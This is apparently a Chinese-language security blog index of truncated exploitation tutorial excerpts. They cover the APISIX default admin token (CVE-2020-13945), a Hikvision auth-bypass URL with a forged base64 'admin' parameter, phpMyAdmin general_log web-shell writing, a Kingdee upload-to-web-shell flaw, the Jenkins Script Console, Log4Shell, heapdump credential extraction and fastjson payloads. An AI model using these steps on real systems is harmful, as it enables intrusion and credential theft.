🗂️ 简介Apache APISIX 是一款云原生高性能 API 网关和微服务代理，广泛应用于企业网关、API 管理、负载均衡、动态路由等场景。 CVE-2020-13945 漏洞的核心点在于： 默认情况下，APISIX 管理端（Admin API）使用默认配置文件中的 Token（edd1c9f034335f136f87ad84b625c8f1）作为管理员认证凭证。 如果用户未更改 Toke

📌 漏洞简介海康威视部分老版本设备存在认证绕过漏洞，攻击者可通过伪造的 Base64 auth 参数直接访问接口： 查看用户列表 抓取实时快照 下载配置文件并解密获取后门账户 🗂️ 漏洞利用步骤 ✅ 1️⃣ 查看系统用户列表访问示例： 1http://<IP>/Security/users?auth=YWRtaW46MTEK YWRtaW46MTEK 是 admin:1

📌 漏洞简介金蝶云·星空（Kingdee Cloud Galaxy）是一款常用于企业 ERP 的云端产品。ScpSupRegHandler 是供应商注册模块的文件上传接口。 漏洞点： 该接口对上传文件的路径和后缀过滤不严； 攻击者可通过构造特殊路径穿越，写入自定义可执行的 .ashx 文件； 再利用 .ashx 文件生成 ASP 一句话木马，实现远程命令执行。 🗂️ 漏洞环境示例 目标：

🎯 漏洞简介Jenkins 是一款流行的开源 CI/CD 自动化部署工具，默认开启了 Script Console（脚本控制台），用于管理员执行 Groovy 脚本对 Jenkins 实例进行动态管理。 核心风险： Script Console 拥有与 Jenkins Master 相同的系统权限。 若攻击者可访问该接口且具备权限（或存在身份验证绕过），即可执行任意系统命令。 可直接

🚀 简介一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发，可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析、内网socks5代理等等……，并带有功能强大的web管理端。 📌 VPS 端配置123456789101112# 拉取 nps Docker 镜像docker pull ffdfgdfg/nps# 启

🚀 简介利用 phpMyAdmin 的错误日志功能，可以巧妙地写入一句话木马，实现远程获取 WebShell。 🔥 利用步骤12345678910111213-- 查看当前日志记录状态show variables like "general_log%";-- 开启通用查询日志set global general_log='on';-- 设置日志文件保存

简介Vulhub是一个基于docker和docker-compose的漏洞环境集合，进入对应目录并执行一条语句即可启动一个全新的漏洞环境，让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理本身。 Github地址：https://github.com/vulhub/vulhub 123456# 下载项目git clone https://github.com/vulhub/vulhub.git

📌 简介Log4j2 是 Java 生态中使用最广泛的日志框架之一。CVE-2021-44228（俗称 Log4Shell）允许远程攻击者通过 JNDI 注入执行任意代码。 影响版本： 2.0-beta9 ~ 2.14.1 修复版本： >= 2.15.0 危害： RCE，完全控制目标服务器 🐳 靶场环境 - VulhubVulhub 是一个基于 Docker 的漏洞测试平

🚀 简介在渗透测试中，常见Spring应用暴露的heapdump文件能够被下载，但很多测试者不知道如何高效利用。本文分享几款实用工具，帮助最大化利用heapdump漏洞，快速提取明文密码、密钥等敏感信息，从而助力后续深度渗透。 📌 漏洞发现与利用流程 查看暴露的Actuator端点http://127.0.0.1:8088/actuator 下载heapdump文件http://127.0

🚀说明 本项目涉及的一些姿势和payload是从之前的随手记的笔记直接粘进来的，很多找不到出处了所以来源未贴出来，望师傅们见谅。 判断是否用了fastjson鉴别fastjsonDNSLOG 1{"@type":"java.net.InetSocketAddress"{"address":,"val&qu